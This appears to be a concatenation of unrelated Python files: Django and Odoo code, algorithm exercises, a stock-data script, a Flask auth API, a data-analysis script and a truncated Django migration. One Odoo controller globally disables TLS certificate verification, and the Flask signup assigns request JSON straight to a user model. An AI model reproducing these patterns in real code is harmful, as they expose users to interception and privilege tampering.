choices=SEX_CHOICES,
verbose_name=_('sex'))
date_of_birth = models.DateField(
blank=True, null=True, verbose_name=_('date of birth'))
def activate_user(user, code):
encoder = UserAuthCode(settings.SECRET_KEY)
if encoder.is_valid(user, code):
user.is_active = True
user.save()
return True
return False
def create_new_user(username, password, first_name, last_name, email):
user = User(
username=username,
first_name=first_name,
last_name=last_name,
email=email,
is_staff=False,
is_active=True,
)
user.set_password(password)
user.save()
return user
|
from onegov.core.security import Personal
from onegov.feriennet import FeriennetApp
from onegov.feriennet.forms import UserProfileForm
from onegov.org.models import Organisation
from onegov.org.views.userprofile import handle_user_profile
@FeriennetApp.form(
model=Organisation, name='userprofile', template='userprofile.pt',
permission=Personal, form=UserProfileForm)
def handle_custom_user_profile(self, request, form):
return handle_user_profile(self, request, form)
|
import unittest
from tree_utils import NodeWithParent
def suscessor(node):
"""Return the successor of a node in a bst.
case 1: node has right subtree, return the leftmost node in the subtree;
case 2: node has no right subtree, trace back its parent until it's not
a right branch, return that parent;
If it's al right branch up to root, return None.
"""
if node is None:
return None
if node.right:
res = node.right
while res.left:
res = res.left
else:
parent = node.parent
while parent:
if parent.left == node:
break
node = parent
parent = node.parent
res = parent
return res
class SuccessorTest(unittest.TestCase):
def setUp(self):
nwp = NodeWithParent
self.root = nwp(3,
nwp(0,
None,
nwp(2,nwp(1))),
nwp(4))
def test_successor_none(self):
self.assertEqual(suscessor(None), None)
self.assertEqual(suscessor(self.root.right), None)
def test_successor_right(self):
self.assertEqual(suscessor(self.root).data, 4)
self.assertEqual(suscessor(self.root.left).data, 1)
def test_successor_parent(self):
self.assertEqual(suscessor(self.root.left).data, 1)
self.assertEqual(suscessor(self.root.left.right).data, 3)
if __name__ == '__main__':
unittest.main()
|
# coding=utf-8
import os
import sys
import time
from datetime import datetime, timedelta
import django
prjPath = r'E:\GitHub\myapp\net\website\django\mysite1'
dataPath = r'D:\data'
#from net.website.django.mysite1.myapp.rules import Submarket
sys.path.append( prjPath )
django.setup()
import sqlite3 as db
#conn = db.connect(r"E:\GitHub\myapp\net\website\django\mysite1\db.sqlite3")
conn = db.connect( django.conf.settings.DATABASES['default']['NAME'] ) #r"D:\data\slowdb\db.sqlite3")
#import mysql as db #connector.paramstyle
#import MySQLdb as db
#conn = db.connect( host='localhost', user='root', passwd='', db='myapp', charset='utf8' )
#from selenium import webdriver
from myapp.rules import Submarket, MapSubmarket2Table # net.website.django.mysite1.
from myapp.models import * #Product_, Product, KDaily, KMin, WatchList, Market, StockInfo, TradeRealTime
def arrangeCsvScan(dir):
import scandir
for path, subdirs, files in scandir.walk(dir):
for fn in files:
market,submarket,code,market,x = fn.split('.')
if x<>'csv':
sys.stdout.write( 'not csv file:' + fn + '\r\n' )
#submarket = Submarket(market, code)
os.rename( os.path.join(path,fn), os.path.join(path,market + '.' + submarket + '.' + code + '.' + 'csv') )
def arrangeCsv8Dict(prodDict8Submarket):
for key in prodDict8Submarket.keys():
if key==None or key == '' or key == 'ERR':
continue
market = key[:2]
for prod in prodDict8Submarket[key]:
csvfn = r'D:\data\histcsv\ths\%s.%s.csv' % (market,prod.code)
if os.path.isfile(csvfn):
with open(csvfn) as fp:
f = fp.read()
else:
continue
lines = f.split('\n')
histRec = []
for ln in lines[1:]:
fLst = ln.split(',')
if len(fLst)<7:
continue
if fLst[0]<=dateHistEnd:
break
#fLst[0] = datetime.strptime(fLst[0], '%Y-%m-%d')
#for i in range(len(fLst[1:])):
# fLst[i+1] = float(fLst[i+1])
histRec.append( [ int(prod.id) ] + fLst )
if histRec == []:
continue
else:
newAfterHistEnd = True
if prod.dateHistEnd == None:
newBeforeHistBegin = True
return
def workYesterday( d=datetime.now() ):
weekday = d.strftime('%w') # if today is Sunday or Monday
sunday=6 # sqlite3: 0
monday=0 # sqlite3: 1
if weekday == sunday:
return (datetime.now()- timedelta(2)).strftime('%Y-%m-%d') # Friday for Sunday
elif weekday == monday:
return (datetime.now()- timedelta(3)).strftime('%Y-%m-%d') # Friday for Monday
else:
return (datetime.now()- timedelta(1)).strftime('%Y-%m-%d')
def execScript4Mysql(conn, script):
sqlLst = script.split(';')
cur = conn.cursor()
for sql in sqlLst:
if sql.strip()=='':
continue
cur.execute(sql)
conn.commit()
def useMemDb():
f = open('myapp.sql')
sql = f.read()
#cur = django.db.connections['default1'].cursor()
mem = django.db.connections['default1']
django.db.connections['default1'] = django.db.connections['default']
django.db.connections['default'] = mem
cur = django.db.connection.cursor()
cur.executescript(sql)
copyDiskDb2Memo()
def save2DiskDb():
'''
prodLst1 = Product.objects.using('default1').all()
marketLst1 = Market.objects.using('default1').all()
kDailyLst1 = KDaily.objects.using('default1').all()
kMinLst1 = KMin.objects.using('default1').all()
watchLst1 = WatchList.objects.using('default1').all()
'''
tblLst = []
tblLst.append( Product.objects.all() )
tblLst.append( Market.objects.all() )
tblLst.append( KDaily.objects.all() )
tblLst.append( KMin.objects.all() )
tblLst.append( WatchList.objects.all() )
Product.objects.using('default1').raw("delete * from myapp_product")
Market.objects.using('default1').raw("delete * from myapp_market")
KDaily.objects.using('default1').raw("delete * from myapp_kdaily")
KMin.objects.using('default1').raw("delete * from myapp_kmin")
WatchList.objects.using('default1').raw("delete * from myapp_watchlist")
#for prod in prodLst1:
for tbl in tblLst:
for rec in tbl:
rec.save(using='default1') ## ??? !!!
def copyDiskDb2Memo():
'''
prodLst1 = Product.objects.using('default1').all()
marketLst1 = Market.objects.using('default1').all()
kDailyLst1 = KDaily.objects.using('default1').all()
kMinLst1 = KMin.objects.using('default1').all()
watchLst1 = WatchList.objects.using('default1').all()
'''
tblLst = []
tblLst.append( Product.objects.using('default1').all() )
tblLst.append( Market.objects.using('default1').all() )
tblLst.append( KDaily.objects.using('default1').all() )
tblLst.append( KMin.objects.using('default1').all() )
tblLst.append( WatchList.objects.using('default1').all() )
#for prod in prodLst1:
for tbl in tblLst:
for rec in tbl:
rec.save(using='default') ## ??? !!!
p = Product.objects.all()
m = Market.objects.all()
k = KDaily.objects.all()
kM = KMin.objects.all()
w = WatchList.objects.all()
def getWatchLst_ThsExport(fn):
try:
with open( fn ) as fp: # HTTP Error 404: Not Found
rslt = fp.readlines()
except IOError, e:
sys.stdout.write( 'except while access file:' + fn + 'IOError: ' + str(e) + '\r\n' )
return ''
wtchL = []
for ln in rslt[1:]:
flds = ln.split('\t')
if flds[0].isdigit():
market = 'HK'
code = flds[0]
else:
market = flds[0][:2]
code = flds[0][2:]
if market not in [ 'SZ', 'SH' ]: #, 'HK' ]:
continue
submarket = Submarket(market, code)
if submarket=='' or submarket[2] <> 'S':
continue
wtchL.append( code+'.'+market )
return wtchL
'''
p = Product.objects.get( code=code, market=market )
if p==None:
sys.stdout.write( 'product not found:' + code + '.' + market + '\r\n' )
continue
pWatch = WatchList(product=p, watchReason='')
pWatch.save()
'''
#for prod in SSEProdLst:
# getAStockRealtime()
# watchLst: prodCode market
def getDzhCodeLst(fn, market):
try:
with open( fn ) as fp:
lines = fp.readlines()
except IOError, e:
sys.stdout.write( 'except while access file:' + fn + 'IOError: ' + str(e) + '\r\n' )
return ''
recLst = []
for ln in lines[2:]:
fLst = ln.strip().split('\t')
#recLst.append( [p.id] + fLst[2:] )
p=Product(source='dzh', code=fLst[0], type='', market=market, name=fLst[1].decode('GBK'), submarket = Submarket(market, fLst[0]), maskSite='.' ) #, bDataHist=False
recLst.append(p)
Product.objects.bulk_create( recLst )
'''
t = time.clock()
#useMemDb()
print('usememdb time: %.03f' % (time.clock()-t) )
t = time.clock()
save2DiskDb()
print('save2DiskDb time: %.03f' % (time.clock()-t) )
'''
|
num=int(input("enter your no:"))
Num=int(input("enter your no:"))
if(Num>num):
print(Num,"is maximum no")
else:
print("is not the maximum no.") |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenElanz
# Copyright (C) 2012-2013 Elanz Centre (<http://www.openelanz.fr>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import logging
import ssl
import openerp
from openerp import http
from openerp import SUPERUSER_ID
from openerp.http import request
from openerp.tools.translate import _
from openerp.addons.web.controllers import main
from openerp.addons.web.controllers.main import Session
from datetime import datetime
import datetime
_logger = logging.getLogger(__name__)
if hasattr(ssl, '_create_unverified_context'):
ssl._create_default_https_context = ssl._create_unverified_context
class nstdaweb_docker_monitor_http(http.Controller):
@http.route('/app/nstdaweb_docker_monitor/get_port', auth='public')
def index(self, api_key=None, api_secret=None, m=None):
if not api_key or not api_secret or not m:
return "-1"
env_source = request.env['nstdaweb.docker.monitor.source']
source = env_source.sudo().search(
[('api_key', '=', api_key), ('api_secret', '=', api_secret)], limit=1
)
port = '-1'
if source:
port = source.sudo().forecast_port(m)
else:
port = "-1"
return str(port)
@http.route('/app/nstdaweb_docker_monitor/last_use', auth='public')
def last_use(self, api_key=None, api_secret=None):
if not api_key or not api_secret:
return "-1"
monitor = request.env['nstdaweb.docker.monitor.source']
source = monitor.sudo().search(
[('api_key', '=', api_key), ('api_secret', '=', api_secret)], limit=1
)
last_use_data = "-1"
if source:
last_use_data = source.sudo().last_use_data()
else:
last_use_data = "-1"
return str(last_use_data)
@http.route('/app/nstdaweb_docker_monitor/standby', auth='public')
def standby(self, api_key=None, api_secret=None):
if not api_key or not api_secret:
return "-1"
monitor = request.env['nstdaweb.docker.monitor.source']
source = monitor.sudo().search(
[('api_key', '=', api_key), ('api_secret', '=', api_secret)], limit=1
)
data = "-1"
if source:
data = source.sudo().set_standby()
else:
data = "-1"
return str(data)
|
class Solution(object):
def candy(self, ratings):
"""
:type ratings: List[int]
:rtype: int
"""
if not ratings: return 0
n = len(ratings)
c = [1 for _ in range(n)]
sum = 0
for i in range(1,n):
if ratings[i]>ratings[i-1]:
c[i] = c[i-1]+1
for i in reversed(range(n-1)):
if ratings[i]>ratings[i+1]:
c[i] = max(c[i+1]+1, c[i])
sum += c[i]
return sum + c[-1]
|
import re
REGEX = re.compile(r'(\d+) positions|position (\d+)')
class Disc:
def __init__(self, length, initial):
self.positions = [0] + [1] * (length - 1)
self.position = initial
def open(self, time):
return self.positions[(self.position + time) % len(self.positions)] == 0
def solve(data):
discs = []
for line in data:
length = int(REGEX.findall(line)[0][0])
position = int(REGEX.findall(line)[1][1])
discs.append(Disc(length, position))
solved = 0
time = 0
while not solved:
release_time = time
time += 1
for disc in discs:
if disc.open(time):
solved = 1
else:
solved = 0
break
time += 1
return release_time
if __name__ == '__main__':
with open('input.txt') as f:
data = f.read().splitlines()
print(solve(data)) |
import datetime
from flask import request
from flask_jwt_extended import create_access_token
from api.models.user import User
from flask_restful import Resource
from mongoengine.errors import FieldDoesNotExist, ValidationError, DoesNotExist, NotUniqueError
from .errors import InternalServerError, EmailAlreadyExistsError, SchemaValidationError, UnauthorizedError
class SignupApi(Resource):
def post(self):
try:
body = request.get_json()
user = User(**body)
user.hash_password()
user.save()
id = user.id
return {'id': str(id), 'message': 'Signup is successful'}, 200
except (FieldDoesNotExist, ValidationError):
raise SchemaValidationError
except NotUniqueError:
raise EmailAlreadyExistsError
except Exception:
raise InternalServerError
class LoginApi(Resource):
def post(self):
try:
body = request.get_json()
user = User.objects.get(email=body.get('email'))
authorized = user.check_password(body.get('password'))
if not authorized:
raise UnauthorizedError
expires = datetime.timedelta(days=7)
access_token = create_access_token(identity=str(user.id), expires_delta=expires)
return {'token': access_token, 'message': f'{user.username} is authenticated'}, 200
except (UnauthorizedError, DoesNotExist):
raise UnauthorizedError
except Exception:
raise InternalServerError
|
# IMPORTS
import pandas as pd
from scipy.stats.stats import pearsonr
import zipfile
# EXTRA FUNCTIONS
# Function to iterate through columns
def getcolumn(matrix, col):
columna = []
for row in matrix:
columna.append(row[col])
return columna
# PERSONALITY DATA
# Obtaining a list of the ids
dataunfiltered = pd.read_csv(r"...\TFG\AÑO PASADO\datos_def\ids_equivalence.csv")
data1 = dataunfiltered[dataunfiltered["genero"] == 1] # Women's ids
idslist = data1["id_rodrigo"].to_list()
# Obtaining personality data from experts
data2 = pd.read_excel(r"...\TFG\AÑO PASADO\datos_def\personalidad_2019.xlsx")
list1_as_set = set(data1["id_rodrigo"])
intersection = list1_as_set.intersection(data2["id_rodrigo"])
ids = list(intersection)
data = data2[data2["id_rodrigo"].isin(ids)]
# PERSONALITY FEATURES
# Obtaining all audio features
featuresunfiltered = pd.read_excel(r"...\TFG\AÑO PASADO\datos_def\audio_2019.xlsx")
all_features = featuresunfiltered[featuresunfiltered["id_rodrigo"].isin(ids)]
features = all_features
# VARIABLES
m_data = data.values
m_features = features.values
c_data = data.columns
c_features = features.columns
l_data = len(m_data[0])
l_features = len(m_features[0])
# CORRELATIONS
correlations = {}
i, j = 2, 1
while i < l_data:
col_data = getcolumn(m_data, i)
while j < l_features:
col_features = getcolumn(m_features, j)
correlations[str(c_data[i]) + "__" + str(c_features[j])] = pearsonr(
col_data, col_features
)
j += 1
i += 1
j = 1
result = pd.DataFrame.from_dict(correlations, orient="index")
result.columns = ["PCC", "p-value"]
potentialcorrelations = result.sort_index()[
result.sort_index()["p-value"].between(0, 0.05)
]
# EXPORTATION
with zipfile.ZipFile("NEW-correlations2019.zip", "w") as csv_zip:
csv_zip.writestr("NEW-all-correlations2019.csv", result.sort_index().to_csv())
csv_zip.writestr(
"NEW-potential-correlations2019.csv",
potentialcorrelations.sort_index().to_csv(),
)
|
# both strings and listst are sequences of items
c = ["H", 4, "Hello"]
print(c)
c.append(4)
print(c)
c.remove("H")
print(c)
c.remove(4) # removes first occurence
print(c)
print(dir(c))
c.remove(c[2]) # remove third element
# "" - empty string
# [] - empty list
|
from csv import reader
import json
import os
from dotenv import load_dotenv
from collections import defaultdict
load_dotenv()
def csv_to_item_table(file_name1, file_name2, file_name3):
data = []
with open(file_name1, 'r') as csv_file:
csv_data = list(reader(csv_file))
for row in csv_data[1:]:
record = defaultdict(dict)
record['model'] = 'core.Item'
record['pk'] = row[0]
record['fields']['title'] = row[1]
record['fields']['price'] = row[2]
record['fields']['category'] = row[3]
record['fields']['label'] = row[4]
record['fields']['slug'] = row[5]
record['fields']['description'] = row[6]
record['fields']['image'] = 'images/' + row[7] + '.jpg'
data.append(record)
with open(file_name2, 'r') as csv_file:
csv_data = list(reader(csv_file))
for row in csv_data[1:]:
record = defaultdict(dict)
record['model'] = 'core.ItemVariation'
record['pk'] = row[0]
record['fields']['variation'] = row[1]
record['fields']['value'] = row[3]
record['fields']['attachment'] = row[4]
data.append(record)
for id in range(1,71):
record = defaultdict(dict)
record['model'] = 'core.Variation'
record['fields']['item'] = id
record['pk'] = id
record['fields']['name'] = 'color'
data.append(record)
with open(file_name3, 'r') as csv_file:
csv_data = list(reader(csv_file))
for row in csv_data[1:]:
record = defaultdict(dict)
record['model'] = 'core.ItemVariation'
record['pk'] = row[0]
record['fields']['variation'] = row[1]
record['fields']['value'] = row[3]
record['fields']['attachment'] = 'images/' + row[4] + '.jpg'
data.append(record)
for id in range(71,141):
record = defaultdict(dict)
record['model'] = 'core.Variation'
record['fields']['item'] = id - 70
record['pk'] = id
record['fields']['name'] = 'size'
data.append(record)
google_api = {
'model': 'socialaccount.SocialApp',
'pk': 1,
'fields': {
'provider': 'google',
'name': 'googleapi',
'client_id': os.getenv('GOOGLE_CLIENT_ID'),
'secret': os.getenv('GOOGLE_SECRET_KEY'),
}
}
github_api = {
'model': 'socialaccount.SocialApp',
'pk': 2,
'fields': {
'provider': 'github',
'name': 'githubapi',
'client_id': os.getenv('GITHUB_CLIENT_ID'),
'secret': os.getenv('GITHUB_SECRET_KEY'),
'key': os.getenv('GITHUB_KEY'),
}
}
social_site = {
'model': 'sites.Site',
'pk': 1,
'fields': {
'domain': os.getenv('DOMAIN_NAME'),
'name': os.getenv('DISPLAY_NAME'),
}
}
data.extend([github_api, google_api, social_site])
with open('./core/fixtures/images_data.json', 'w') as json_object:
json_object.write(json.dumps(data, indent=4))
print('Added csv file data to Json file...\n')
if __name__ == '__main__':
csv_file_name1 = 'images_data.csv'
csv_file_name2 = 'item color variations.csv'
csv_file_name3 = 'item size variations.csv'
# Reads data from csv file and transfers it to database tables
csv_to_item_table(csv_file_name1, csv_file_name2, csv_file_name3)
|
# Generated by Django 4.0.5 on 2022-06-25 15:48
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0004_alter_live_data'),
]
operations = [
migrations.AddField(
model_name='game',
name='TOCGameT1L1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCGameT1L2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCGameT1L3',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCGameT1L4',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCGameT1L5',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCGameT1L6',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCGameT1L7',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCGameT2L1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCGameT2L2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCGameT2L3',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCGameT2L4',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCGameT2L5',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCGameT2L6',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCGameT2L7',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCPeriodT1L1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCPeriodT1L2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCPeriodT1L3',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCPeriodT1L4',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCPeriodT1L5',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCPeriodT1L6',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCPeriodT1L7',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCPeriodT2L1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCPeriodT2L2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCPeriodT2L3',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCPeriodT2L4',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCPeriodT2L5',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCPeriodT2L6',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='TOCPeriodT2L7',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaGameT1L1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaGameT1L2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaGameT1L3',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaGameT1L4',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaGameT1L5',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaGameT1L6',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaGameT1L7',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaGameT2L1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaGameT2L2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaGameT2L3',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaGameT2L4',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaGameT2L5',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaGameT2L6',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaGameT2L7',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaPeriodT1L1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaPeriodT1L2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaPeriodT1L3',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaPeriodT1L4',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaPeriodT1L5',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaPeriodT1L6',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaPeriodT1L7',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaPeriodT2L1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaPeriodT2L2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaPeriodT2L3',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaPeriodT2L4',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaPeriodT2L5',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaPeriodT2L6',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gaPeriodT2L7',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfGameT1L1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfGameT1L2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfGameT1L3',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfGameT1L4',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfGameT1L5',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfGameT1L6',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfGameT1L7',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfGameT2L1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfGameT2L2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfGameT2L3',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfGameT2L4',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfGameT2L5',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfGameT2L6',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfGameT2L7',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfPeriodT1L1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfPeriodT1L2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfPeriodT1L3',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfPeriodT1L4',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfPeriodT1L5',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfPeriodT1L6',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfPeriodT1L7',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfPeriodT2L1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfPeriodT2L2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfPeriodT2L3',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfPeriodT2L4',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfPeriodT2L5',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfPeriodT2L6',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='gfPeriodT2L7',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='goalsGameT1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='goalsGameT2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='goalsPeriodT1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='goalsPeriodT2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='lineOnT1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='lineOnT2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='nameL1',
field=models.CharField(max_length=50, null=True),
),
migrations.AddField(
model_name='game',
name='nameL2',
field=models.CharField(max_length=50, null=True),
),
migrations.AddField(
model_name='game',
name='nameL3',
field=models.CharField(max_length=50, null=True),
),
migrations.AddField(
model_name='game',
name='nameL4',
field=models.CharField(max_length=50, null=True),
),
migrations.AddField(
model_name='game',
name='nameL5',
field=models.CharField(max_length=50, null=True),
),
migrations.AddField(
model_name='game',
name='nameL6',
field=models.CharField(max_length=50, null=True),
),
migrations.AddField(
model_name='game',
name='nameL7',
field=models.CharField(max_length=50, null=True),
),
migrations.AddField(
model_name='game',
name='nameT1',
field=models.CharField(max_length=50, null=True),
),
migrations.AddField(
model_name='game',
name='nameT2',
field=models.CharField(max_length=50, null=True),
),
migrations.AddField(
model_name='game',
name='possessionGameT1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionGameT1L1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionGameT1L2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionGameT1L3',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionGameT1L4',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionGameT1L5',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionGameT1L6',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionGameT1L7',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionGameT2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionGameT2L1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionGameT2L2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionGameT2L3',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionGameT2L4',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionGameT2L5',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionGameT2L6',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionGameT2L7',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionPeriodT1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionPeriodT1L1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionPeriodT1L2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionPeriodT1L3',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionPeriodT1L4',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionPeriodT1L5',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionPeriodT1L6',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionPeriodT1L7',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionPeriodT2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionPeriodT2L1',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionPeriodT2L2',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionPeriodT2L3',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionPeriodT2L4',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionPeriodT2L5',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionPeriodT2L6',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='possessionPeriodT2L7',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='game',
name='xGGameT1',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGGameT2',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGPeriodT1',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGPeriodT2',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaGameT1L1',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaGameT1L2',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaGameT1L3',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaGameT1L4',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
migrations.AddField(
model_name='game',
name='xGaGameT1L5',
